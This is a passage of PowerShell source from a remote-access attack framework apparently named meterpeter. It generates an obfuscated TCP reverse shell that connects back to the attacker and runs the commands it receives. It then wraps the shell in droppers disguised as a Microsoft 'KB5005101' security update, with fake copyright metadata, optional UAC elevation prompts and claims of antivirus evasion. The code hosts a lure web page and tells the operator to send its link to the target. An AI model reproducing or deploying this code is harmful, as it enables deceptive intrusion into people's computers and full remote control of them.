$String)\r\n  {\r\n    $RandomNumber = (1..2) | Get-Random;\r\n    \r\n    If($RandomNumber -eq \"1\")\r\n    {\r\n      $Letter = \"$Letter\".ToLower();\r\n    }\r\n\r\n    If($RandomNumber -eq \"2\")\r\n    {\r\n      $Letter = \"$Letter\".ToUpper();\r\n    }\r\n\r\n    $RandomString += $Letter;\r\n    $RandomNumber = $Null;\r\n  }\r\n  \r\n  $String = $RandomString;\r\n  Return $String;\r\n}\r\n\r\nfunction msaudite($String){\r\n\r\n  $finalcmdline = \"ASC\" + \"II\" -join ''\r\n  $PowerShell = \"I`E`X(-Jo\" + \"in((@)|%{[char](`$_-BX\" + \"OR #)}));Exit\" -join ''\r\n  $Key = '0x' + ((0..5) | Get-Random) + ((0..9) + ((65..70) + (97..102) | % {[char]$_}) | Get-Random);Start-Sleep -Milliseconds 30\r\n  (  '!'|%  {${~ }=  +$()}{  ${ /'}=${~ }}  {${) }  =  ++  ${~ }}{  ${;.*}=(  ${~ }=${~ }+  ${) })  }{  ${)#+}  =(${~ }  =  ${~ }  +  ${) }  )}  {  ${~(}=(${~ }=  ${~ }  +  ${) }  )  }{  ${*-}=  (${~ }  =${~ }+${) })}{${()``}=(${~ }=  ${~ }  +  ${) }  )}  {${]/!}=  (  ${~ }  =  ${~ }  +  ${) })}  {${# }  =  (${~ }  =  ${~ }+  ${) }  )  }{${*;}  =  (${~ }=  ${~ }+  ${) }  )}  {${/}  =\"[\"+  \"$(@{  })\"[  ${]/!}  ]+  \"$(@{  })\"[\"${) }${*;}\"]+  \"$(  @{  }  )\"[  \"${;.*}${ /'}\"]+\"$?  \"[  ${) }  ]  +  \"]\"  }{${~ }  =  \"\".(\"$(@{})  \"[\"${) }${~(}\"  ]+\"$(  @{  })  \"[\"${) }${()``}\"]+\"$(  @{  })  \"[  ${ /'}]  +  \"$(  @{  }  )\"[  ${~(}  ]+  \"$?  
\"[  ${) }]+  \"$(@{  }  )\"[${)#+}]  )  }  {  ${~ }=\"$(@{})\"[  \"${) }${~(}\"]  +\"$(@{  })\"[  ${~(}  ]+  \"${~ }\"[  \"${;.*}${]/!}\"  ]  }  )  ;  .${~ }(  \"  ${/}${)#+}${()``}+  ${/}${# }${)#+}+  ${/}${) }${) }${()``}+${/}${) }${) }${~(}  +${/}${) }${ /'}${*-}+${/}${) }${) }${ /'}  +  ${/}${) }${ /'}${)#+}  +${/}${)#+}${;.*}  +  ${/}${()``}${) }+  ${/}${)#+}${;.*}  +${/}${)#+}${()``}+  ${/}${~(}${ /'}  +  ${/}${*;}${) }+${/}${# }${)#+}  +  ${/}${) }${;.*}${) }+  ${/}${) }${) }${*-}+${/}${) }${) }${()``}  +  ${/}${) }${ /'}${) }+  ${/}${) }${ /'}${*;}+${/}${~(}${()``}  +  ${/}${# }${~(}+${/}${) }${ /'}${) }+  ${/}${) }${;.*}${ /'}+${/}${) }${) }${()``}+${/}${~(}${()``}  +${/}${()``}${*;}  +${/}${) }${) }${ /'}  +  ${/}${*;}${*;}  +  ${/}${) }${) }${) }  +  ${/}${) }${ /'}${ /'}  +${/}${) }${ /'}${*-}  +${/}${) }${) }${ /'}+  ${/}${) }${ /'}${)#+}+  ${/}${*;}${)#+}+  ${/}${*-}${# }+${/}${*-}${# }  +  ${/}${)#+}${()``}+  ${/}${) }${ /'}${;.*}  +  ${/}${) }${ /'}${*-}  +  ${/}${) }${) }${ /'}  +  ${/}${*;}${]/!}  +${/}${) }${ /'}${# }  +${/}${*;}${*;}+${/}${) }${ /'}${*;}  +  ${/}${) }${ /'}${ /'}+  ${/}${) }${ /'}${# }+${/}${) }${ /'}${*-}+${/}${) }${) }${ /'}  +${/}${) }${ /'}${) }+  ${/}${~(}${()``}+  ${/}${]/!}${) }+  ${/}${) }${ /'}${) }+${/}${) }${) }${()``}+${/}${()``}${()``}  +  ${/}${) }${;.*}${) }  +  ${/}${) }${) }${()``}+  ${/}${) }${ /'}${) }+  ${/}${) }${) }${*-}+  ${/}${~(}${ /'}  +${/}${)#+}${()``}+${/}${# }${)#+}  +${/}${) }${) }${()``}  +${/}${) }${) }${~(}  +  ${/}${) }${ /'}${*-}+${/}${) }${) }${ /'}  +  ${/}${) }${ /'}${)#+}+${/}${~(}${) }+  ${/}${) }${;.*}${~(}+  ${/}${)#+}${]/!}+${/}${) }${;.*}${)#+}  +${/}${)#+}${()``}+  ${/}${*;}${*-}+  ${/}${)#+}${;.*}+${/}${~(}${*-}  +${/}${()``}${()``}  +${/}${# }${# }  +${/}${]/!}${*;}  +  ${/}${# }${;.*}+${/}${)#+}${;.*}  +${/}${)#+}${()``}  +${/}${]/!}${*-}  +  ${/}${) }${ /'}${) }+${/}${) }${;.*}${) }  +  ${/}${) }${;.*}${*-}  +  ${/}${~(}${) }+  ${/}${)#+}${;.*}  +  ${/}${~(}${*-}  +${/}${) }${ 
/'}${()``}  +${/}${) }${) }${) }  +  ${/}${) }${ /'}${*-}+  ${/}${) }${) }${ /'}  +  ${/}${)#+}${;.*}+  ${/}${)#+}${*;}+${/}${~(}${~(}+${/}${)#+}${*;}|${~ }\")\r\n  \r\n  $PowerShell = Char_Obf($PowerShell);$PowerShell = $PowerShell -replace \"@\",\"$String\";$PowerShell = $PowerShell -replace \"#\",\"$Key\";\r\n  $CMD = \"hello world\";$CMD = Char_Obf($CMD);$CMD = $CMD -replace \"@\",\"$String\";$CMD = $CMD -replace \"#\",\"$Key\";\r\n\r\n  Return $PowerShell,$CMD;\r\n}\r\n\r\nfunction ChkDskInternalFuncio($String){\r\n\r\n  $RandomVariable = (0..99);\r\n  For($i = 0; $i -lt $RandomVariable.count; $i++){\r\n\r\n    $Temp = (-Join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_}));\r\n\r\n    While($RandomVariable -like \"$Temp\"){\r\n      $Temp = (-Join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_}));\r\n    }\r\n\r\n    $RandomVariable[$i] = $Temp;\r\n    $Temp = $Null;\r\n  }\r\n\r\n  $RandomString = $String;\r\n\r\n  For($x = $RandomVariable.count; $x -ge 1; $x--){\r\n  \t$Temp = $RandomVariable[$x-1];\r\n    $RandomString = \"$RandomString\" -replace \"\\`$$x\", \"`$$Temp\";\r\n  }\r\n\r\n  $String = $RandomString;\r\n  Return $String;\r\n}\r\n\r\nfunction NetworkStats($IP,$Port,$Base64_Key){\r\n\r\n  [int]$Signature = Get-Random -Minimum 1 -Maximum 3\r\n  $dadoninho = \"Fr`omB\" + \"ase`6\" + \"4Str`ing\" -Join ''\r\n  $deskmondll = \"`$mscorelib='1'+'024' -Join '';`$MicrosoftAccountCloudAP='Cre'+'ateIn'+'stance' -join '';powershell (New-Object -ComObject Wscript.Shell).Popup('Security update installed.',$Signature,'KB5005101 21H1',0+0);`$3=`\"#`\";`$1=[System.Byte[]]::`$MicrosoftAccountCloudAP([System.Byte],`$mscorelib);Get-Date|Out-File bios.log;`$filemgmtdll='FromB'+'ase6'+'4String' -Join '';`$2=([Convert]::`$filemgmtdll(`\"@`\"));`$4=I``E``X([System.Runtime.Int\"+\"eropServices.Marshal]::PtrToStr\"+\"ingAuto([System.Runtime.InteropSe\"+\"rvices.Marshal]::SecureStringToBSTR((`$3|ConvertTo-SecureString -Key 
`$2))));While(`$5=`$4.GetStream()){;While(`$5.DataAvailable -or `$6 -eq `$1.count){;`$6=`$5.Read(`$1,0,`$1.length);`$7+=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(`$1,0,`$6)};If(`$7){;`$8=(I``E``X(`$7)2>&1|Out-String);If(!(`$8.length%`$1.count)){;`$8+=`\" `\"};`$9=([text.encoding]::ASCII).GetBytes(`$8);`$5.Write(`$9,0,`$9.length);`$5.Flush();`$7=`$Null}}\";\r\n\r\n  $Key = $([System.Convert]::$dadoninho($Base64_Key))\r\n  #$NewKey = (3,4,2,3,56,34,254,222,1,1,2,23,42,54,33,233,1,34,2,7,6,5,35,43)\r\n  $C2 = ConvertTo-SecureString \"New-Object System.Net.Sockets.TCPClient('$IP','$Port')\" -AsPlainText -Force | ConvertFrom-SecureString -Key $Key;\r\n\r\n  $deskmondll = ChkDskInternalFuncio(Char_Obf($deskmondll));\r\n  $deskmondll = $deskmondll -replace \"@\",\"$Base64_Key\";\r\n  $deskmondll = $deskmondll -replace \"#\",\"$C2\";\r\n\r\n  Return $deskmondll;\r\n}\r\n\r\nClear-Host;\r\nWrite-Host $StartBanner\r\nwrite-host \"     * GitHub: https://github.com/r00t-3xp10it/meterpeter *`n`n\" -ForegroundColor DarkYellow\r\n$DISTRO_OS = pwd|Select-String -Pattern \"/\" -SimpleMatch; # <-- (check IF windows|Linux Separator)\r\nIf($DISTRO_OS)\r\n{\r\n   ## Linux Distro\r\n   $IPATH = \"$pwd/\"\r\n   $Flavor = \"Linux\"\r\n   $Bin = \"$pwd/mimiRatz/\"\r\n   $APACHE = \"/var/www/html/\"\r\n}Else{\r\n   ## Windows Distro\r\n   $IPATH = \"$pwd\\\"\r\n   $Flavor = \"Windows\"\r\n   $Bin = \"$pwd\\mimiRatz\\\"\r\n   $APACHE = \"$env:LocalAppData\\webroot\\\"\r\n}\r\n\r\n$Obfuscation = $null\r\n## User Input Land ..\r\nWrite-Host \"Input Local Host: \" -NoNewline;\r\n$LHOST = Read-Host;\r\n$Local_Host = $LHOST -replace \" \",\"\";\r\nWrite-Host \"Input Local Port: \" -NoNewline;\r\n$LPORT = Read-Host;\r\n$Local_Port = $LPORT -replace \" \",\"\";\r\n\r\n## Default settings\r\nIf(-not($Local_Port)){$Local_Port = \"666\"};\r\nIf(-not($Local_Host)){\r\n   If($DISTRO_OS){\r\n      ## Linux Flavor\r\n      $Local_Host = ((ifconfig | grep [0-9].\\.)[0]).Split()[-1]\r\n   
}else{\r\n      ## Windows Flavor\r\n      $Local_Host = ((ipconfig | findstr [0-9].\\.)[0]).Split()[-1]\r\n   }\r\n}\r\n\r\nIf($Flavor -ieq \"Windows\")\r\n{\r\n   Write-Host \"`n`n* Payload dropper format selection!\" -ForegroundColor Black -BackgroundColor Gray\r\n   Write-Host \"Id DropperFileName        Format  AVDetection  UacElevation  PsExecutionBypass\" -ForegroundColor Green\r\n   Write-Host \"-- --------------------   ------  -----------  ------------  -----------------\"\r\n   Write-Host \"1  Update-KB5005101.bat   BAT     Undetected   optional      true\"\r\n   Write-Host \"2  Update-KB5005101.hta   HTA     Undetected   false         true\"\r\n   Write-Host \"3  Update-KB5005101.exe   EXE     Undetected   optional      true\" -ForegroundColor Yellow\r\n   Write-Host \"4  Update-KB5005101.vbs   VBS     Undetected   optional      true\" -ForegroundColor DarkGray\r\n   $FlavorSellection = Read-Host \"Id\"\r\n}\r\nElseIf($Flavor -ieq \"Linux\")\r\n{\r\n   Write-Host \"`n`n* Payload dropper format selection!\" -ForegroundColor Black -BackgroundColor Gray\r\n   Write-Host \"Id DropperFileName       Format  AVDetection  UacElevation  PsExecutionBypass\" -ForegroundColor Green\r\n   Write-Host \"-- --------------------  ------  -----------  ------------  -----------------\"\r\n   Write-Host \"1  Update-KB5005101.bat  BAT     Undetected   optional      true\"\r\n   Write-Host \"2  Update-KB5005101.hta  HTA     Undetected   false         true\"\r\n   $FlavorSellection = Read-Host \"Id\"\r\n}\r\n## End Of venom Function ..\r\n\r\n\r\n$viriatoshepard = (\"T@oB@a\" + \"s@e6@4St@\" + \"r@i@n@g\" -join '') -replace '@',''\r\n## 32 random bytes = AES-256 key for ConvertFrom-SecureString -Key (Get-Random -Maximum is exclusive, so 256 keeps 0xFF reachable)\r\n$Key = (1..32 | % {[byte](Get-Random -Minimum 0 -Maximum 256)});\r\n$Base64_Key = $([System.Convert]::$viriatoshepard($Key));\r\n\r\nWrite-Host \"`n[*] Generating Payload ✔\";\r\n$deskmondll = NetworkStats -IP $Local_Host -Port $Local_Port -Base64_Key $Base64_Key;\r\n\r\nWrite-Host \"[*] Obfuscation Type: BXOR ✔\"\r\n$deskmondll = 
msaudite($deskmondll);\r\n\r\nClear-Host;\r\nWrite-Host $StartBanner\r\nwrite-host \"      * GitHub: https://github.com/r00t-3xp10it/meterpeter *`n`n\" -ForegroundColor DarkYellow\r\nWrite-Host \" - Payload    : $payload_name.ps1\"\r\nWrite-Host \" - Local Host : $Local_Host\"\r\nWrite-Host \" - Local Port : $Local_Port\"\r\nStart-Sleep -Milliseconds 800\r\n\r\n$PowerShell_Payload = $deskmondll[0];\r\n$CMD_Payload = $deskmondll[1];\r\n\r\nWrite-Host \"`n[*] PowerShell Payload:`n\"\r\nWrite-Host \"$PowerShell_Payload\" -ForeGroundColor black -BackGroundColor white\r\n\r\n\r\nwrite-host \"`n`n\"\r\n$My_Output = \"$PowerShell_Payload\" | Out-File -FilePath $IPATH$payload_name.ps1 -Force;\r\n\r\n## Better obfu`scated IE`X system call\r\n$ttl = (\"I\" + \"@_`X\" -Join '') -replace '@_','E'\r\n#((Get-Content -Path $IPATH$payload_name.ps1 -Raw) -Replace \"$ttl\",\"Get-Date -Format 'HH:mm:ss'|Out-File bios.log;&(''.SubString.ToString()[67,72,64]-Join'')\")|Set-Content -Path $IPATH$payload_name.ps1\r\n((Get-Content -Path $IPATH$payload_name.ps1 -Raw) -Replace \"$ttl\",\"&('REX' -replace 'R','I')\")|Set-Content -Path $IPATH$payload_name.ps1\r\n\r\n\r\n$Server_port = \"$Local_Host\"+\":\"+\"$HTTP_PORT\";\r\n$check = Test-Path -Path \"/var/www/html/\";\r\nIf($check -ieq $False)\r\n{\r\n\r\n   try{\r\n     #Check Attacker http.server\r\n     python -V > $Env:TMP\\ff.log\r\n     $Python_version = (Get-Content \"$Env:TMP\\ff.log\" -ErrorAction SilentlyContinue)\r\n     Remove-Item -Path \"$Env:TMP\\ff.log\" -Force -ErrorAction SilentlyContinue\r\n   }Catch{}\r\n\r\n  If(-not([string]::IsNullOrEmpty($Python_version)))\r\n  {\r\n    $Webroot_test = Test-Path -Path \"$env:LocalAppData\\webroot\\\";\r\n    If($Webroot_test -ieq $True){cmd /R rmdir /Q /S \"%LocalAppData%\\webroot\\\";mkdir $APACHE|Out-Null}else{mkdir $APACHE|Out-Null};\r\n    ## Attacker: Windows - with python3 installed\r\n    # Deliver Dro`pper.zip using python http.server\r\n    write-Host \"   WebServer    Client  
              Dropper               WebRoot\" -ForegroundColor Green;\r\n    write-Host \"   ---------    ------                -------               -------\";\r\n    write-Host \"   Python3      Update-KB5005101.ps1  Update-KB5005101.zip  $APACHE\";write-host \"`n`n\";\r\n    Copy-Item -Path $IPATH$payload_name.ps1 -Destination $APACHE$payload_name.ps1 -Force\r\n\r\n    If($FlavorSellection -eq 2)\r\n    {\r\n    \r\n       <#\r\n       .SYNOPSIS\r\n          Author: @r00t-3xp10it\r\n          Helper - meterpeter payload HTA drop`per application\r\n       #>\r\n\r\n       cd $Bin\r\n       #delete old files left behind by previous executions\r\n       If(Test-Path -Path \"$Dropper_Name.hta\" -EA SilentlyContinue)\r\n       {\r\n          Remove-Item -Path \"$Dropper_Name.hta\" -Force\r\n       }\r\n\r\n       #Make sure HTA template exists before go any further\r\n       If(-not(Test-Path -Path \"Update.hta\" -EA SilentlyContinue))\r\n       {\r\n          Write-Host \"ERROR: file '${Bin}Update.hta' not found ...\" -ForeGroundColor Red -BackGroundColor Black\r\n          Write-Host \"`n\";exit #Exit @Meterpeter\r\n       }\r\n \r\n       #Replace the  server ip addr + port on HTA template\r\n       ((Get-Content -Path \"Update.hta\" -Raw) -Replace \"CharlieBrown\",\"$Server_port\")|Set-Content -Path \"Update.hta\"\r\n\r\n       #Embebed meterpter icon on HTA application?\r\n       #iwr -Uri \"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/theme/meterpeter.ico\" -OutFile \"meterpeter.ico\"|Out-Null\r\n       #Start-Process -WindowStyle hidden cmd.exe -ArgumentList \"/R COPY /B meterpeter.ico+Update.hta $Dropper_Name.hta\" -Wait\r\n\r\n       Copy-Item -Path \"Update.hta\" -Destination \"$Dropper_Name.hta\" -Force\r\n       #Compress HTA application and port the ZIP archive to 'webroot' directory!\r\n       Compress-Archive -LiteralPath \"$Dropper_Name.hta\" -DestinationPath \"${APACHE}${Dropper_Name}.zip\" -Force\r\n\r\n       #Revert 
original HTA to default to be used again\r\n       ((Get-Content -Path \"Update.hta\" -Raw) -Replace \"$Server_port\",\"CharlieBrown\")|Set-Content -Path \"Update.hta\"\r\n\r\n       #Delete artifacts left behind\r\n       #Remove-Item -Path \"meterpeter.ico\" -EA SilentlyContinue -Force\r\n       Remove-Item -Path \"$Dropper_Name.hta\" -EA SilentlyContinue -Force\r\n\r\n       #return to meterpeter working directory (meterpeter)\r\n       cd $IPATH\r\n    \r\n    }\r\n    ElseIf($FlavorSellection -eq 3)\r\n    {\r\n    \r\n       <#\r\n       .SYNOPSIS\r\n          Author: @r00t-3xp10it\r\n          Helper - meterpeter payload EXE dro`pper application\r\n       #>\r\n\r\n       cd $Bin\r\n       $Dropper_Bat = \"Update.ps1\"\r\n       $Dropper_Exe = \"Update-KB5005101.exe\"\r\n       ((Get-Content -Path \"$Dropper_Bat\" -Raw) -Replace \"CharlieBrown\",\"$Server_port\")|Set-Content -Path \"$Dropper_Bat\"\r\n\r\n       #Download the required files from my GITHUB meterpeter repository!\r\n       iwr -Uri \"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/PS2EXE/ps2exe.ps1\" -OutFile \"ps2exe.ps1\"|Out-Null\r\n       iwr -Uri \"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/PS2EXE/meterpeter.ico\" -OutFile \"meterpeter.ico\"|Out-Null\r\n\r\n       $RunEXElevated = Read-Host \"[i] Make dropper spawn UAC dialog to run elevated? (y|n)\"\r\n       If($RunEXElevated -iMatch '^(y|yes)$')\r\n       {\r\n          .\\ps2exe.ps1 -inputFile \"$Dropper_Bat\" -outputFile \"$Dropper_Exe\" -iconFile \"meterpeter.ico\" -title \"Secure KB Update\" -version \"45.19041.692.2\" -copyright \"©Microsoft Corporation. 
All Rights Reserved\" -product \"KB5005101\" -noError -noConsole -requireAdmin|Out-Null\r\n          Start-Sleep -Seconds 2\r\n       }\r\n       Else\r\n       {\r\n          .\\ps2exe.ps1 -inputFile \"$Dropper_Bat\" -outputFile \"$Dropper_Exe\" -iconFile \"meterpeter.ico\" -title \"Secure KB Update\" -version \"45.19041.692.2\" -copyright \"©Microsoft Corporation. All Rights Reserved\" -product \"KB5005101\" -noError -noConsole|Out-Null\r\n          Start-Sleep -Seconds 2\r\n       }\r\n\r\n       #Compress EXE executable and port the ZIP archive to 'webroot' directory!\r\n       Compress-Archive -LiteralPath \"$Dropper_Exe\" -DestinationPath \"$APACHE$Dropper_Name.zip\" -Force\r\n\r\n       #Revert meterpeter EXE template to default state, after successfully created\\compressed the binary drop`per (PE)\r\n       ((Get-Content -Path \"$Dropper_Bat\" -Raw) -Replace \"$Server_port\",\"CharlieBrown\")|Set-Content -Path \"$Dropper_Bat\"\r\n\r\n       #Clean all artifacts left behind by this function!\r\n       Remove-Item -Path \"meterpeter.ico\" -EA SilentlyContinue -Force\r\n       Remove-Item -Path \"$Dropper_Exe\" -EA SilentlyContinue -Force\r\n       Remove-Item -Path \"ps2exe.ps1\" -EA SilentlyContinue -Force\r\n       cd $IPATH\r\n    \r\n    }\r\n    ElseIf($FlavorSellection -eq 4)\r\n    {\r\n    \r\n       <#\r\n       .SYNOPSIS\r\n          Author: @r00t-3xp10it\r\n          Helper - meterpeter payload VBS drop`per application\r\n\r\n       .NOTES\r\n          This function accepts ip addresses from 11 to 14 chars (local)\r\n          example: 192.168.1.1 (11 chars) to 192.168.101.122 (15 chars)\r\n\r\n          The 'auto-elevation' function requires UAC enabled and ru`nas.\r\n       #>\r\n\r\n       If(-not(Test-Path -Path \"$IPATH\\Download_Crandle.vbs\" -EA SilentlyContinue))\r\n       {\r\n          ## Download crandle_builder.ps1 from my GitHub repository\r\n          iwr -uri 
\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/utils/crandle_builder.ps1\" -OutFile \"crandle_builder.ps1\"|Unblock-File\r\n       }\r\n\r\n       #Evasion\\Obfusca`tion\r\n       $NumberOfChars = $Local_Host.length\r\n       $SeconRange = $Server_port[5,6,7,8] -join ''                         # 68.1\r\n       $FirstRange = $Server_port[0,1,2,3,4] -join ''                       # 192.1\r\n       If($NumberOfChars -eq 11)\r\n       {\r\n          #Example: 192.168.1.7 + :8087 = 15 chars\r\n          $trithRange = $Server_port[9,10,11,12,13,14,15] -join ''\r\n       }\r\n       ElseIf($NumberOfChars -eq 12)\r\n       {\r\n          #Example: 192.168.1.72 + 8087 = 16 chars\r\n          $trithRange = $Server_port[9,10,11,12,13,14,15,16] -join ''       # .72:8087\r\n       }\r\n       ElseIf($NumberOfChars -eq 13)\r\n       {\r\n          #Example: 192.168.1.122 + 8087 = 17 chars\r\n          $trithRange = $Server_port[9,10,11,12,13,14,15,16,17] -join ''     \r\n       }\r\n       ElseIf($NumberOfChars -eq 14)\r\n       {\r\n          #Example: 192.168.15.124 + 8087 = 18 chars\r\n          $trithRange = $Server_port[9,10,11,12,13,14,15,16,17,18] -join ''     \r\n       }\r\n       ElseIf($NumberOfChars -eq 15)\r\n       {\r\n          #Example: 192.168.151.124 + 8087 = 19 chars\r\n          $trithRange = $Server_port[9,10,11,12,13,14,15,16,17,18,19] -join ''     \r\n       }\r\n\r\n       $Crandle_Build = Read-Host \"[i] Create (D)ownload or (F)ileless dropper script? 
(D|F)\"\r\n       If($Crandle_Build -iMatch '^(f|fileless)$')\r\n       {\r\n          $fuckOrNot = \"fileless\"\r\n          $Technic = Read-Host \"[i] Choose the fileless technique to add to the crandle (1|2|3|4)\"\r\n       }\r\n       Else\r\n       {\r\n          #Default (%tmp%)\r\n          $fuckOrNot = \"download\"\r\n       }\r\n\r\n       If($Technic -Match '^(2)$')\r\n       {\r\n          $Technic = \"two\"       \r\n       }\r\n       ElseIf($Technic -Match '^(3)$')\r\n       {\r\n          $Technic = \"three\"       \r\n       }\r\n       ElseIf($Technic -Match '^(4)$')\r\n       {\r\n          $Technic = \"four\"       \r\n       }\r\n       Else\r\n       {\r\n          $Technic = \"one\"\r\n       }\r\n\r\n\r\n       $PayloadName = \"$payload_name\" + \".ps1\" -join ''\r\n       $RunEXElevated = Read-Host \"[i] Make dropper spawn UAC dialog to run elevated ? (Y|N)\"\r\n       If($RunEXElevated -iMatch '^(y|yes)$')\r\n       {\r\n          <#\r\n          .SYNOPSIS\r\n             Author: @r00t-3xp10it\r\n             Helper - Execute VBS with administrator privileges?\r\n\r\n          .NOTES\r\n             This function adds a cmdline to the beginning of the vbs script file\r\n             that invokes 'ru`nas' to spawn a UAC dialog box to elevate application privileges.\r\n\r\n             No execution is achieved (crandler) if the target user does not\r\n             accept running the crandler with elevated privileges (UAC dialog box).\r\n          #>\r\n\r\n          powershell -file crandle_builder.ps1 -action \"$fuckOrNot\" -VbsName \"Download_Crandle.vbs\" -PayloadName \"$PayloadName\" -UACElevation 'true' -Technic \"$Technic\" -Egg 'true'|Out-Null\r\n       }\r\n       Else\r\n       {\r\n          powershell -file crandle_builder.ps1 -action \"$fuckOrNot\" -VbsName \"Download_Crandle.vbs\" -PayloadName \"$PayloadName\" -UACElevation 'false' -Technic \"$Technic\" -Egg 'true'|Out-Null\r\n       }\r\n\r\n       #Replace the attacker ip addr 
(obfus`cated\\split) on vbs template\r\n       ((Get-Content -Path \"Download_Crandle.vbs\" -Raw) -Replace \"VIRIATO\",\"$SeconRange\")|Set-Content -Path \"Download_Crandle.vbs\"\r\n       ((Get-Content -Path \"Download_Crandle.vbs\" -Raw) -Replace \"COLOMBO\",\"$FirstRange\")|Set-Content -Path \"Download_Crandle.vbs\"\r\n       ((Get-Content -Path \"Download_Crandle.vbs\" -Raw) -Replace \"NAVIGATOR\",\"$trithRange\")|Set-Content -Path \"Download_Crandle.vbs\"\r\n\r\n       #Download vbs_obfuscator from GitHub repository\r\n       #iwr -uri https://raw.githubusercontent.com/DoctorLai/VBScript_Obfuscator/master/vbs_obfuscator.vbs -outfile vbs_obfuscator.vbs|Unblock-File\r\n\r\n       #Obfusc`ate Program.vbs sourcecode.\r\n       #cscript.exe vbs_obfuscator.vbs Download_Crandle.vbs > Buffer.vbs\r\n\r\n       #Parse data\r\n       $CrandleVbsName = \"${Dropper_Name}\" + \".vbs\" -Join '' # Update-KB500101.vbs\r\n       #$Obfusc`atedData = Get-Content Buffer.vbs | Select-Object -Skip 3\r\n       #echo $Obfusc`atedData > $CrandleVbsName\r\n\r\n\r\n       Start-sleep -Milliseconds 300\r\n       #Change vbs crandle signature (add junk function)\r\n       #[int]$Chars = Get-Random -Minimum 6 -Maximum 20 #Random variable length sellection! 
(from 6 => 20)\r\n       #$RandVar = -join ((65..90) + (97..122) | Get-Random -Count $Chars | % {[char]$_}) #Random variable creation!\r\n       #((Get-Content -Path \"Download_Crandle.vbs\" -Raw) -Replace \"#REPLACEME\",\"Dim reverse\")|Set-Content -Path \"$CrandleVbsName\"\r\n\r\n       #Compress VBS and port the ZIP archive to 'webroot' directory!\r\n       Rename-Item -Path Download_Crandle.vbs -NewName $CrandleVbsName -Force\r\n\r\n\r\n       ### COMPILE VBS TO EXE\r\n       #C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe /target:exe /out:\"$pwd\\${Drop`per_Name}.exe\" \"$pwd\\${Dropp`er_Name}.vbs\" /platform:anyCPU\r\n       Compress-Archive -LiteralPath \"$CrandleVbsName\" -DestinationPath \"${APACHE}${Dropper_Name}.zip\" -Force\r\n       #Move-Item -Path \"$CrandleVbsName\" -Destination \"${APACHE}${Drop`per_Name}.vbs\" -Force\r\n\r\n       #Clean all artifacts left behind\r\n       Remove-Item -Path \"Buffer.vbs\" -EA SilentlyContinue -force\r\n       Remove-Item -Path \"vbs_obfuscator.vbs\" -EA SilentlyContinue -force\r\n       Remove-Item -Path \"crandle_builder.ps1\" -EA SilentlyContinue -force\r\n       Remove-Item -Path \"Download_Crandle.vbs\" -EA SilentlyContinue -force\r\n       Remove-Item -Path \"$CrandleVbsName\" -EA SilentlyContinue -force\r\n    }\r\n    Else\r\n    {\r\n    \r\n       <#\r\n       .SYNOPSIS\r\n          Author: @r00t-3xp10it\r\n          Helper - meterpeter payload BAT drop`per script\r\n       #>\r\n\r\n       ## (ZIP + add LHOST) to dro`pper.bat before send it to apache 2 webroot ..\r\n       Copy-Item -Path \"$Bin$Dropper_Name.bat\" -Destination \"${Bin}BACKUP.bat\"|Out-Null\r\n       ((Get-Content -Path $Bin$Dropper_Name.bat -Raw) -Replace \"CharlieBrown\",\"$Server_port\")|Set-Content -Path $Bin$Dropper_Name.bat\r\n\r\n       $RunEXElevated = Read-Host \"[i] Make dropper spawn UAC dialog to run elevated? 
(y|n)\"\r\n       If($RunEXElevated -iMatch '^(y|yes)$')\r\n       {\r\n\r\n          <#\r\n          .SYNOPSIS\r\n             Author: @r00t-3xp10it\r\n             Helper - Execute Batch with administrator privileges?\r\n\r\n          .NOTES\r\n             This function add's a cmdline to the beggining of bat file that uses\r\n             'Net Session' API to check for admin privs before executing powershell\r\n             -run`as on current process spawning a UAC dialogbox of confirmation.\r\n          #>\r\n\r\n          $MyRunes = \"r\" + \"una\" + \"s\" -join ''\r\n          #TODO: run bat with admin privs ??? -> requires LanManServer (server) service active\r\n          ((Get-Content -Path $Bin$Dropper_Name.bat -Raw) -Replace \"@echo off\",\"@echo off`nsc query `\"lanmanserver`\"|find `\"RUNNING`\" >nul`nif %ERRORLEVEL% EQU 0 (`n  Net session >nul 2>&1 || (PowerShell start -verb $MyRunes '%~0' &exit /b)`n)\")|Set-Content -Path $Bin$Dropper_Name.bat\r\n       }\r\n\r\n       Compress-Archive -LiteralPath $Bin$Dropper_Name.bat -DestinationPath $APACHE$Dropper_Name.zip -Force\r\n       #Revert original BAT to default to be used again\r\n       Remove-Item -Path \"$Bin$Dropper_Name.bat\" -Force\r\n       Copy-Item -Path \"${Bin}BACKUP.bat\" -Destination \"$Bin$Dropper_Name.bat\"|Out-Null\r\n       Remove-Item -Path \"${Bin}BACKUP.bat\" -Force\r\n\r\n    }\r\n\r\n    write-Host \"[i] Send the URL generated to target to trigger download..\" -ForegroundColor DarkYellow;\r\n    Copy-Item -Path \"${IPATH}\\Mimiratz\\theme\\Catalog.png\" -Destination \"${APACHE}Catalog.png\"|Out-Null\r\n    Copy-Item -Path \"${IPATH}\\Mimiratz\\theme\\favicon.png\" -Destination \"${APACHE}favicon.png\"|Out-Null\r\n    Copy-Item -Path \"${IPATH}\\Mimiratz\\theme\\Update-KB5005101.html\" -Destination \"${APACHE}Update-KB5005101.html\"|Out-Null\r\n    ((Get-Content -Path \"${APACHE}Update-KB5005101.html\" -Raw) -Replace \"henrythenavigator\",\"$Dropper_Name\")|Set-Content -Path 
\"${APACHE}Update-KB5005101.html\"\r\n\r\n    Write-Host \"[i] Attack Vector: http://$Server_port/$Dropper_Name.html\" -ForeGroundColor Black -BackGroundColor white\r\n\r\n    #tinyurl function\r\n    powershell -file \"${IPATH}\\Mimiratz\\shorturl.ps1\" -ServerPort \"$Server_port\" -PayloadName \"${Dropper_Name}.html\"\r\n\r\n    ## Start python http.server (To Deliver Drop`per/Payload)\r\n    Start-Process powershell.exe \"write-host `\" [http.server] Close this Terminal After receving the connection back in meterpeter ..`\" -ForeGroundColor red -BackGroundColor Black;cd $APACHE;$PInterpreter -m http.server $HTTP_PORT --bind $Local_Host\";\r\n  }\r\n  else\r\n  {\r\n    ## Attacker: Windows - without python3 installed\r\n    # Manualy Deliver Drop`per.ps1 To Target Machine\r\n    write-Host \"   WebServer      Client                Local Path\" -ForegroundColor 